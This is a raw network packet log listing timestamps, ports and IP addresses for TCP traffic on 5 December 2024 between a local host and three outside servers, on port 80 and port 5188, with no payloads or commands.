Dec 5, 2024 17:32:15.544663906 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.545685053 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.545726061 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.546072960 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.546116114 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.546870947 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.546916962 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.546926975 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.546962976 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.548060894 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.548105001 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.548136950 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.548176050 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.549149990 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.549261093 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.549307108 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.550333023 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.550378084 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.550539970 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.550578117 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.551487923 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.551532030 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.551975965 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.552018881 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.552615881 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.552661896 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.552730083 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.552767992 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.553787947 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.553833961 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.553956985 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.553993940 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.554930925 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.554972887 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.555134058 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.555174112 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.556086063 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.556127071 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.556135893 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.556159019 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.557250023 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.557295084 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.557322979 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.557362080 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.584088087 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.584418058 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.584460020 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.584703922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.584980965 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.585633993 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.585815907 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.586030960 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.586132050 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.586988926 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.587085009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.587121010 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.588077068 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.588233948 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.588269949 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.589240074 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.590409040 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.590423107 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.590526104 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.590560913 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.590560913 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.591620922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.591634035 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.591710091 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.592693090 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.592854977 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.593842030 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.593853951 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.593859911 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.594732046 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.594980955 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.595987082 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.596044064 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.596127033 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.596138954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.596401930 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.597218037 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.597400904 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.597462893 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.598412991 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.598695993 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.598912954 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.599517107 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.599754095 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.600610018 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.600651026 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.601028919 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.601711988 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.601732969 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.602598906 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.602989912 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.603003025 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.603054047 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.603054047 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.604020119 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.604629040 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.605151892 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.605484009 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.605493069 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.606360912 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.606373072 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.606379032 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.606728077 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.607450008 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.607528925 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.607589960 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.608547926 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.608761072 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.608896971 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.608908892 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.608985901 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.608985901 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.609051943 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.609914064 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.609926939 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.610735893 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.610897064 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.611093044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.611344099 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.612015009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.612139940 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.613116026 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.613199949 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.613212109 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.613224983 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.613262892 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.613271952 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.613467932 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.614250898 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.614373922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.614389896 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.615382910 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.615432978 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.615803003 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.616559982 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.616961002 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.617002010 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.617002010 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.735634089 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.736252069 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.736264944 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.736411095 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.736644983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.739335060 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.856415033 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.856432915 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.856504917 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.860204935 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.860219002 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.860405922 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.976202965 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.976233006 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.976250887 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976262093 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976274014 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976284981 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976296902 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976301908 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.976309061 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976320982 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976334095 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976346016 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976352930 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.976356983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976368904 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976376057 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.976381063 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976393938 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976406097 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976460934 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.976460934 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.976573944 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.976587057 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.976598024 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976618052 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976629019 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976638079 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.976639986 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976653099 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976665020 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976681948 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.976699114 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.976722002 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.976752043 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976764917 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976775885 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976788044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976809025 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976819992 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976830006 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976843119 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.976850986 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.976897955 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.977500916 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.977551937 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.977615118 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.977628946 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.977641106 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.977653027 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.977664948 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.977664948 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.977679014 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.977689981 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.977703094 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.977708101 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.977708101 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.977714062 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.977730989 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.977766991 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.978133917 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.978156090 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.978166103 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.978178024 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.978188038 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.978228092 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.978234053 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.978269100 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.978388071 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.978399992 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.978411913 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.978424072 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.978430986 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.978437901 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.978445053 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.978451967 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.978463888 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.978465080 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.978477001 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.978481054 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.978487968 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.978501081 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.978507042 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.978513956 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.978526115 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.978542089 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.978552103 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.978590965 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.979465961 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.979477882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.979490042 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.979501963 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.979511023 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.979512930 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.979522943 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.979526043 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.979547024 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.979549885 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.979556084 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.979561090 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.979566097 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.979572058 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.979572058 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.979578018 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.979583979 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.979589939 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.979595900 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.979608059 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.979635000 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.980663061 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.980675936 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.980690002 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.980705023 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.980715990 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.980729103 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.980735064 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.980736017 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.980741024 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.980751991 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.980753899 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.980773926 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.980807066 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.980988026 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.980999947 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.981036901 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.981064081 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.981076002 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.981101990 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.981123924 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.981127024 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.981136084 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.981156111 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.981167078 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.981172085 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.981204987 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.981781006 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.981795073 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.981822014 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.981829882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.981838942 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.981848001 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.981859922 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.981872082 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.981873989 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.981884003 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.981897116 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.981903076 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.981903076 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.981909990 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.981928110 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.981942892 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.981995106 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982007027 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982017994 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982033014 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982033968 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.982043982 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982053041 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.982057095 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982074976 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982080936 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.982099056 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.982120991 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.982825994 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982836962 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982851028 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982861996 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982871056 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.982873917 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982887030 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982896090 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.982897997 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982903957 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.982911110 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982922077 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982933998 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.982939005 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982959986 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.982973099 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.982984066 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.982985020 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983016014 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.983330011 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983374119 CET	80	49793	185.215.113.84	192.168.2.11
